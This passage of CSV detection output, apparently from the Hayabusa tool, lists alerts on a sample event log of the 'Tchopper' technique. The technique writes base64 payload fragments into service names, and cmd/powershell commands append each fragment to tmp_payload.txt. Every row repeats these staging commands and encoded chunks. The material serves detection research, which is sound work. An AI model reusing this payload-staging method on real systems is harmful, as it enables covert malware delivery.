Tchopper.evtx" +2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:57.355 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 